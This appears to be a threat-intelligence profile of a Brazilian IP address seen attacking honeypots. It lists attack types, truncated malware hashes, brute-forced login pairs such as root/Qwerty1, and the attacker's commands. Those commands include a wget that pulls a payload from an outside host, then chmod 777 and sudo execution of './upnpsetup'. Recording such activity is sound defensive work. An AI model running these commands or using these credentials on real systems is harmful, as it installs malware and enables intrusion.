TROYANOSYVIRUS
Active ThreatMEDIUM

187.32.245.125

Country of Origin🇧🇷 Brazil
First Detection1/7/2026
Last Activity1/7/2026
ISPALGAR TELECOM SA
🎯
79
Total Attacks
🔌
2
Ports
📡
2
Attack Types
🦠
9
Malware

Geolocation

Country
🇧🇷 Brazil
City
São Paulo
ASN
AS16735
ISP
ALGAR TELECOM SA

Attack Types

cowrie
dionaea

Attacked Ports

44522

Associated Malware

c97583710ce600cd6a8d...751a5bdfa8c56fe998ad...7063dece7cccf374d9fa...3b8ae1b78629fd197b93...cef42dd41a9bb1f66362...

Attempted Credentials

🔐user2/Qwerty1
2x
🔐admin/NoPassGst1234
1x
🔐user/Qwerty1
1x
🔐admin/Qwerty1
1x
🔐root/Qwerty1
1x

Executed Commands

$./upnpsetup2x
$uname -m&&pkill upnpsetup1x
$chmod 777 ./upnpsetup1x
$rm ./upnpsetup1x
$sudo ./upnpsetup1x
$uname -a1x
$sudo pkill upnpsetup1x
$hostname1x
$wget -nc http://45.87.174.8/k.php?a=x86_64,0Y1KR44SJP0K7F3DH -O ./upnpsetup1x

Risk Assessment

55
/100
LowMediumHighCritical